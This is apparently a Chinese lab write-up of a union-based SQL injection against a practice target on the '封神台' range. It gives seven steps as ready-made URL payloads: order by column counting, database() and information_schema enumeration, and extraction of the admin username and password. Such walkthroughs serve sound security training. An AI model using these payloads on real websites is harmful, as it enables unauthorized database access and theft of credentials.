靶场环境:封神台
第一步
http://59.63.200.79:8003/?id=2-1
验证注入点存在
第二步
http://59.63.200.79:8003/?id=1 order by 1/2/…
查询到长度为2
第三步
http://59.63.200.79:8003/?id=9.99 union select 1,2
验证数据返回点,返回值为2
第四步
http://59.63.200.79:8003/?id=9.99 union select 1,database()
查询到库名为maoshe
第五步
http://59.63.200.79:8003/?id=9.99 union select 1,table_name from information_schema.tables where table_schema=database()
查询到maoshe库下的表名
admin
dirs
news
xss
第六步
http://59.63.200.79:8003/?id=9.99 union select 1,column_name from information_schema.columns where table_name=‘admin’ and table_schema=database()
查询到admin表下字段名 #group_concat(column_name)
id
username
password
第七步
http://59.63.200.79:8003/?id=9.99 union select 1,password from admin
查询到admin下用户名和密码分别为
admin
hellohack